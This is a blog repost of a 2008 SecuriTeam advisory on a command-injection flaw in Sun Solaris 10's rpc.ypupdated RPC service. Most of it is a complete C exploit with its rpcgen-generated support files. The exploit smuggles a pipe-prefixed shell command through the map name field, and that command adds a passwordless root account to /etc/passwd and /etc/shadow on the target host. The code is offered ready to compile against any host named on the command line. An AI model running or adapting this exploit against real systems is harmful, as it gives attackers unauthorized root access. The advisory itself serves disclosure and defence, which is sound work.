Sun Solaris rpc.ypupdated Arbitrary Command Execution

    [晴 March 20, 2008 14:32 | by ]
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)

Insufficient filtering done on user provided input by the rpc.ypupdated RPC process under the Sun Solaris operating system allows remote attackers to cause the process to execute arbitrary commands.

Vulnerable Systems:
* Sun Solaris 10

Exploit:


ypk.c:
/*update: kcope/year2008/tested on SunOS 5.10//

  KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES)

  If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV) it executes a shell through which extra commands may be launched  on the remote host by passing '|shell command'.
i.e. the COMM variable contains a pipe character after which a
  command may be passed. You may change the command by changing this.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <rpc/rpc.h>

#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255

typedef struct{
unsigned int yp_buf_len;
char * yp_buf_val;

} yp_buf;

struct ypupdate_args{
char * mapname;
yp_buf key;
yp_buf datum;

};

typedef struct ypupdate_args ypupdate_args;

#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif

void main(argc, argv)
int argc;
char *argv[];
{

CLIENT * cli;

unsigned long prog=100028;
unsigned int vers=1;

struct sockaddr_in skn;
struct timeval timeVal;
struct hostent * hostEnt;

ypupdate_args ypArg;
unsigned long rtnval;

unsigned int desc;

char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >>
/etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";

if(argc<2) {
  printf("example: yxp target\n");
  exit(1);
}

timeVal.tv_usec=0;
timeVal.tv_sec=15;
desc=RPC_ANYSOCK;

ypArg.datum.yp_buf_val="x";
ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;

ypArg.key.yp_buf_val="x";
ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;

ypArg.mapname=comm;

if ((hostEnt=gethostbyname(argv[1]))==NULL){
  printf("gethostbyname failure\n");
  exit(1);
}

skn.sin_family=AF_INET;skn.sin_port=htons(0);
bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);

if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){
  printf("clntudp_create failure\n");
  exit(1);
}

cli->cl_auth=authunix_create("localhost",0,0,0,0);

clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);

}

ypupdate_prot.h:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/

#ifndef _YPUPDATE_PROT_H_RPCGEN
#define _YPUPDATE_PROT_H_RPCGEN

#include <rpc/rpc.h>

/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */

/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255

typedef struct {
u_int yp_buf_len;
char *yp_buf_val;

} yp_buf;

#ifdef __cplusplus
extern "C" bool_t xdr_yp_buf(XDR *, yp_buf*);
#elif __STDC__
extern bool_t xdr_yp_buf(XDR *, yp_buf*);
#else /* Old Style C */
bool_t xdr_yp_buf();
#endif /* Old Style C */

struct ypupdate_args {
char *mapname;
yp_buf key;
yp_buf datum;


};

typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#elif __STDC__
extern bool_t xdr_ypupdate_args(XDR *, ypupdate_args*);
#else /* Old Style C */
bool_t xdr_ypupdate_args();
#endif /* Old Style C */

struct ypdelete_args {
char *mapname;
yp_buf key;


};

typedef struct ypdelete_args ypdelete_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#elif __STDC__
extern bool_t xdr_ypdelete_args(XDR *, ypdelete_args*);
#else /* Old Style C */
bool_t xdr_ypdelete_args();
#endif /* Old Style C */

#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)

#ifdef __cplusplus
#define YPU_CHANGE ((u_long)1)
extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);

#elif __STDC__
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);

#else /* Old Style C */
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1();
extern u_int * ypu_change_1_svc();
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1();
extern u_int * ypu_insert_1_svc();
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1();
extern u_int * ypu_delete_1_svc();
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1();
extern u_int * ypu_store_1_svc();
#endif /* Old Style C */

#endif /* !_YPUPDATE_PROT_H_RPCGEN */

ypupdate_prot_xdr.c:
/*
* Please do not edit this file.
* It was generated using rpcgen.
*/

#include "ypupdate_prot.h"
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */

/*
* Compiled from ypupdate_prot.x using rpcgen
* This is NOT source code!
* DO NOT EDIT THIS FILE!
*/

bool_t
xdr_yp_buf(XDR *xdrs, yp_buf *objp)
{

  register long *buf;

  if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int
*)&objp->yp_buf_len, MAXYPDATALEN)) {
   return (FALSE);
  }
return (TRUE);

}

bool_t
xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp)
{
  register long *buf;

  if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
   return (FALSE);
  }
  if (!xdr_yp_buf(xdrs, &objp->key)) {
   return (FALSE);
  }
  if (!xdr_yp_buf(xdrs, &objp->datum)) {
   return (FALSE);
  }
return (TRUE);

}

bool_t
xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp)
{
  register long *buf;
  if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
   return (FALSE);
  }
  if (!xdr_yp_buf(xdrs, &objp->key)) {
   return (FALSE);
  }
return (TRUE);

}

Additional Information:
The information has been provided by kcope .
The original article can be found at: http://www.milw0rm.com/exploits/5282

===========================================================================­=
====
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body
to: html-list-unsubscr...@securiteam.com
In order to subscribe to the mailing list and receive advisories in HTML
format, simply forward this email to: html-list-subscr...@securiteam.com
===========================================================================­=
====
===========================================================================­=
====
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
Tags: , , , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(7545)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive